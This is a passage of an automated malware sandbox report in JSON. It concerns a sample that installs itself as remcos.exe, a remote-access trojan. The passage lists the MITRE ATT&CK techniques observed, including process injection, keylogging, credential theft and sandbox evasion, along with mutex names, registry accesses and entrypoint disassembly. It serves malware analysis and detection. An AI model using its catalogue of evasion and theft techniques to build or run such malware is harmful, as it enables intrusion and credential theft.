{"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 4, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 23}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"file.exe\" called \"CopyFileW\" to copy C:\\file.exe to new location %ALLUSERSPROFILE%\\tst\\remcos.exe (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"file.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74B20000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74B20000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Rmc-Y7B4RN\"\n \"\\Sessions\\1\\BaseNamedObjects\\_SHuassist.mtx\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"_SHuassist.mtx\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Rmc-Y7B4RN\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"file.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"file.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"file.exe\" touched \"CompatContextMenu Class\" (Path: \"HKCU\\CLSID\\{1D27F844-3A1F-4410-85AC-14651078412D}\")\n \"file.exe\" touched \"7-Zip Shell Extension\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\")\n \"file.exe\" touched \"Previous Versions Property Page\" (Path: \"HKCU\\CLSID\\{596AB062-B4D2-4215-9F74-E9109B0A8153}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Microsoft SendTo Service\" (Path: \"HKCU\\CLSID\\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Copy as Path Menu\" (Path: \"HKCU\\CLSID\\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Start Menu Pin\" (Path: \"HKCU\\CLSID\\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Start Menu Cache\" (Path: \"HKCU\\CLSID\\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\\TREATAS\")\n \"file.exe\" touched \"Taskband Pin\" (Path: \"HKCU\\CLSID\\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\\TREATAS\")\n \"file.exe\" touched \"Shortcut\" (Path: \"HKCU\\CLSID\\{00021401-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"file.exe\" touched \"Internet Shortcut\" (Path: \"HKCU\\CLSID\\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"file.exe\" touched \"User Pinned\" (Path: \"HKCU\\CLSID\\{1F3427C8-5C10-4210-AA03-2EE45287D668}\\SHELLFOLDER\")\n \"file.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{F3364BA0-65B9-11CE-A9BA-00AA004AE837}\\INPROCSERVER32\")\n \"file.exe\" touched \"User Assist\" (Path: \"HKCU\\CLSID\\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\\TREATAS\")\n \"file.exe\" touched \"Shared Task Scheduler\" (Path: \"HKCU\\CLSID\\{603D3801-BD81-11D0-A3A5-00C04FD706EC}\\TREATAS\")\n \"file.exe\" touched \"Groove GFS Context Menu Handler\" (Path: \"HKCU\\CLSID\\{6C467336-8281-4E60-8204-430CED96822D}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Shell extensions for sharing\" (Path: \"HKCU\\CLSID\\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Share Command State Handler\" (Path: \"HKCU\\CLSID\\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2}\\INPROCSERVER32\")\n \"file.exe\" touched \"Sharing Configuration Manager\" (Path: \"HKCU\\CLSID\\{49F371E1-8C5C-4D9C-9A3B-54A6827F513C}\\TREATAS\")\n \"file.exe\" touched \"Encryption Context Menu\" (Path: \"HKCU\\CLSID\\{A470F8CF-A1E8-4F65-8335-227475AA5C46}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Open With Context Menu Handler\" (Path: \"HKCU\\CLSID\\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS\")\n \"file.exe\" touched \"Briefcase\" (Path: \"HKCU\\CLSID\\{85BBD920-42A0-1069-A2E4-08002B30309D}\\SHELLEX\\NOADDTORECENT\")\n \"file.exe\" touched \"Remove Properties Drop Target\" (Path: \"HKCU\\CLSID\\{09A28848-0E97-4CEF-B950-CEA037161155}\\SUPPORTEDPROTOCOLS\")\n \"file.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")\n \"file.exe\" touched \"Offline Files Cache Control\" (Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\TREATAS\")\n \"file.exe\" touched \"Offline Files Service Control\" (Path: \"HKCU\\CLSID\\{69486DD6-C19F-42E8-B508-A53F9F8E67B8}\\TREATAS\")\n \"file.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{EFB23A09-A867-4BE8-83A6-86969A7D0856}\\TREATAS\")\n \"file.exe\" touched \"Offline Files Setting Object\" (Path: \"HKCU\\CLSID\\{FD3659E9-A920-4123-AD64-7FC76C7AACDF}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-21", "type": 9, "relevance": 3, "name": "Launches a browser", "description": "Launches browser \"iexplore.exe\" (UID: 00000000-00006132)\n Launches browser \"iexplore.exe\" (UID: 00000000-00004240)", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00843bbd68@Iphlpapi.DLL\"\n \"0f001000dc3bbd68@Iphlpapi.DLL\"\n \"0c000d00243cbd68@Iphlpapi.DLL\"\n \"140015006c3cbd68@Iphlpapi.DLL\"\n \"0c000d00e03cbd68@Iphlpapi.DLL\"\n \"15001600c02ebd68@ADVAPI32.dll\"\n \"0e000f00702fbd68@ADVAPI32.dll\"\n \"0e000f00cc2fbd68@ADVAPI32.dll\"\n \"11001200b437bd68@ADVAPI32.dll\"\n \"110012004838bd68@ADVAPI32.dll\"\n \"120013008c38bd68@ADVAPI32.dll\"\n \"12001300e438bd68@ADVAPI32.dll\"\n \"14001500385ebd68@ADVAPI32.dll\"\n \"14001500505ebd68@ADVAPI32.dll\"\n \"14001500685ebd68@ADVAPI32.dll\"\n \"17001800805ebd68@ADVAPI32.dll\"\n \"0d000e00985ebd68@ADVAPI32.dll\"\n \"11001200a85ebd68@ADVAPI32.dll\"\n \"11001200bc5ebd68@ADVAPI32.dll\"\n \"0d000e004456bd68@WININET.dll\"\n \"0d000e00b456bd68@WININET.dll\"\n \"10001100ec56bd68@WININET.dll\"\n \"100011009057bd68@WININET.dll\"\n \"10001100005fbd68@WININET.dll\"\n \"10001100145fbd68@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"file.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"remcos.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.6712E6A3.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"file.exe\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"remcos.exe.bin\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"DISMHOST.EXE.6712E6A3.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr 